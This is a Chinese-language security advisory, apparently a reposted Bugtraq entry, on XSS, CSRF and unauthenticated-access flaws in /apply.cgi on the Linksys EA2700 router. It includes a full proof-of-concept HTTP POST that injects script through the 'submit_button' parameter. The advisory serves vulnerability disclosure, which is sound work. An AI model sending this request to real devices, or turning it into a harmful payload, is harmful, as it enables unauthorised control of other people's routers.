发布日期:2013-04-15
更新日期:2013-04-16受影响系统:
Cisco Linksys EA2700
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 59054
Cisco Linksys EA2700是智能Wi-Fi路由器。
Cisco Linksys EA2700(固件版本1.0.12.128947)存在多个安全漏洞,可被恶意用户利用执行跨站脚本和请求伪造攻击,还可绕过某些安全限制。这些漏洞源于没有正确限制对/apply.cgi脚本的访问,造成未授权访问设备设置;/apply.cgi内的"submit_button" POST参数值也没有正确过滤,造成在受影响站点用户浏览器中执行任意HTML和脚本代码;应用没有对HTTP请求的有效性进行检查,造成攻击者控制设备设置。
<*来源:Phil Purviance
链接:http://www.securelist.com/en/advisories/52985
https://superevr.com/blog/2013/dont-use-linksys-routers/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
submit_button=xss'%3balert(1)//934&amp;action=Apply建议:
--------------------------------------------------------------------------------
厂商补丁:
Cisco
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.linksys.com/en-eu/products/routers/EA2700Arecont Vision AV1355DN拒绝服务漏洞(CVE-2013-0139)Java 7 Update 21 修复漏洞,更改applet警告信息相关资讯 Cisco安全漏洞
- Cisco Prime Data Center Network (09/23/2013 05:34:39)
- Cisco WebEx ARF Player内存破坏漏 (09/06/2013 13:42:59)
- Cisco Unified Communications (08/23/2013 19:08:57)
| - Cisco Prime Data Center Network (09/22/2013 18:17:00)
- Cisco Secure Access Control (09/06/2013 13:42:31)
- Cisco VC220/VC240 Network (08/03/2013 14:33:33)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即
|
易网时代-编程资源站